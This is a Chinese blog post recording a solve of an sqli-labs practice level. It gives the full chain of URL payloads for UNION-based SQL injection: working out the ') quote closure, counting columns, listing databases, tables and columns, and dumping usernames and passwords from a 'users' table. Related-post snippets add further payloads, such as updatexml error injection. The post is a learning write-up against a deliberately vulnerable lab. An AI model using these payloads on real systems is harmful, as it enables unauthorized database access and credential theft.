sqli-labs靶场Page1(Basic Challenges)练习记录3

最新推荐文章于 2023-04-03 21:10:47 发布
最新推荐文章于 2023-04-03 21:10:47 发布
阅读量145 收藏
点赞数
分类专栏: 渗透测试学习笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_49015143/article/details/127824413
版权

1.初始状态:

 2.老规矩,先输入?id=1:

 3.输入?id=1 and 1=2--+,发现没有报错,页面一如既往

 4.加个单引号语句试试:?id=1' order by 3--+

 报错语句:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'order by 3-- ') LIMIT 0,1' at line 1

分析可得知,后面想要执行的语句被圈进了一个括号,故修改输入,发现回归正常:

?id=1') order by 3--+

 判断字段数量发现输入4时发生错误,故字段数为3:

?id=1') order by 4--+

 5.找到显示位:

?id=-1') union select 1,2,3--+

 6.开始获取数据库:

当前:

?id=-1') union select 1,database(),3--+

所有:

?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata--+

 7.获取当前数据库的表名:

?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 8.获取users表的字段:

?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+

 9.快完成了,最后一步,获取username和password:

?id=-1') union select 1,group_concat(username),group_concat(password) from users--+

 

风不归Alkaid
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
sqli-labsPage 1)
Lorezon的博客
04-10 297
Less-01 单引号报错。 拼接'and 1=1--+正常,=2异常: 这里直接使用update函数报错注入。 ' and updatexml(1,concat(0x7e,database()),1)--+,直接爆出数据库名。 爆表:' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables ...
sqli-labs page-1
Pz_mstr's Blog
09-10 466
一、前言 终于通关了page-1的内容,现在做一下阶段性的总结。 二、注入思路 三、各关卡讲解 level-1 level-2 level-3 level-4 level-5 level-6 level-7 level-8 level-9 level-10 level-11 level-12 level-13 level-14 level-15 l
SQLI-LABS Page-1
Web学习之路
04-03 268
sqli-labs page-1
SQLi-LABS Page-1 (get篇) 中
weixin_43164512的博客
12-23 179
先说一个确定列数的方法 ?id=1 order by 3 %23 order by 如果我们需要对读取的数据进行排序,我们就可以使用 MySQL 的 ORDER BY 子句来设定你想按哪个字段哪种方式来进行排序,再返回搜索结果。这里就是利用这个功能,通过报错来判别列数。 通过不断增加 order by 后的数字,达到确定列数的目的。 如下面两图,为 3 时,页面正常,为 4 时,页面报错。这...
SQLi-LABS Page-1 (get篇) 上
weixin_43164512的博客
12-17 158
起因 近期打算考一下CISP-PTE,所以找出了多年前的Sqli-libs,准备再刷一遍sql注入,把一些要点记录一下方便以后复习,并和大家分享一下。 准备知识 Sqli-libs使用了mysql数据库,如果你对mysql比较精通,可以跳过本段。 在Sqli-libs中我们需要了解mysql这几个库、表和字段。 information_schema数据库表 它保存着关于MySQL服务器所维护的...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
SQLi-LABS Page-1(Basic Challenges)1-22
05-18
SQLi-LABS Page-1(Basic Challenges)1-22
SQLi-LABS Page-1(Basic Challenges)
07-24
SQLi-LABS Page-1(Basic Challenges) 1-22关 附带多种方法
SQLi-LABS Page-1(Basic Challenges)1-22关
05-18
SQLi-LABS Page-1(Basic Challenges)1-22关
SQLI-LABS——Page-1 Basic Challenges Less-1~Less-20
Ho1aAs‘s Blog
03-28 514
文章目录前言题解Less-1Less-2Less-3Less-4Less-5Less-6Less-7Less-8Less-9Less-10Less-11Less-12Less-13Less-14Less-15Less-16Less-17Less-18Less-19Less-20完 前言 记录一下SQLI-LABS基础部分前二十题,(某些题目只爆出了库名 以下是盲注tips: 时间盲注 报错注入 布尔盲注 题解 Less-1 最简单的单引号字符型注入,回显点有两个,注入两个group_cocnat() [
SQLI-LABS Page1 1-10
菜的只能随便写写博客
12-14 328
0x01 Less-1 字符报错注入 简单报错注入,分号检测 payload: http://192.168.44.139/sqli-labs/Less-1/?id=1' union select 1,2,3,4 --+ 检测字段数,字段为3 http://192.168.44.139/sqli-labs/Less-1/?id=-1' union select 1,user(),3 --+ 查看用户:sqli@localhost http://192.168.44.139/sqli-labs/Less-
SQL注入【SQLi-LABS Page-1(Basic Challenges Less1-Less22)】
小谢的博客
12-05 1763
本篇博客用于记录`SQLi`实验中第一阶段,即基础的`sql`注入,包括了GET和POST联合注入、时间盲注、布尔盲注、报错盲注、文件上传注入等并且内含一些笔者写的自动化注入代码~
SQLi-LABS Page-1(Basic Challenges) 解题
qq_51919093的博客
06-11 1024
关于Sqli-labs靶场的搭建,这篇文章只做解题。
Sqli-labs解题一(Page-1-Basic Challenges)
Bird&Bird
01-05 1478
目录Less-1 单引号字符型注入Less-2 整型注入Less-3 Less-1 单引号字符型注入 输入单引号’,页面报错如下 根据报错知道是单引号字符型注入 判断有多少列(ORDER BY 语句用于根据指定的列对结果集进行排序) ?id=1' order by 3 --+ 爆库名 ?id=-1' union select 1,database(),3 --+ 爆表名 ?id=-1' union select 1,group_concat(table_name) ,3 from informat
Sqli-labs(Page-1)1-22
ChenZIDu的博客
04-25 477
注入的sql一直想写来着的。之前数据库课偷懒的我,留下了悔恨的眼泪。。。(后面看着太烦了就没听了) Less-1 order by语句 order by(默认升序排列) 可以测试一下当前一共select了多少个字段 select * from user where username='1' ORDER BY 3 -- +' union 联合查询语句 union前后的两个sql语句的选择列数要相同...
sqli-labs过关笔记(Page-1:1-22关)
1stPeak's Blog
03-23 1112
判断注入类型详解 (1)首先id=1肯定没错 http://127.0.0.1/?id=1 //正常 (2)加单引号 http://127.0.0.1/?id=1' //正常,很大几率不存在注入;不正常,存在注入 (3)判断数字型 http://127.0.0.1/?id=1 and 1=1//正常 http://127.0.0.1/?id=1 and 1=2//不正常 基本上可以确定是数字型...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8241
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于多种编程语言的卡拉音乐播放器设计源码
最新发布
05-28
本项目是基于多种编程语言的卡拉音乐播放器设计源码,包含625个文件,其中包括389个JavaScript文件、70个TypeScript文件、52个PNG图像文件、22个JSON配置文件、19个Vue文件、12个MAP文件、11个WXSS样式文件、9个WXML模板文件、7个SVG文件和5个EOT字体文件。系统专注于提供卡拉音乐播放器功能,支持歌曲播放、播放列表管理等功能,为用户提供了一个稳定、高效的卡拉音乐播放器。
ubuntu搭建sqli-labs靶场
10-15
好的,以下是搭建sqli-labs靶场的步骤: 1. 安装LAMP环境(Linux + Apache + MySQL + PHP): ``` sudo apt-get update sudo apt-get install apache2 mysql-server php libapache2-mod-php php-mysql ``` 2. ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

风不归Alkaid

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值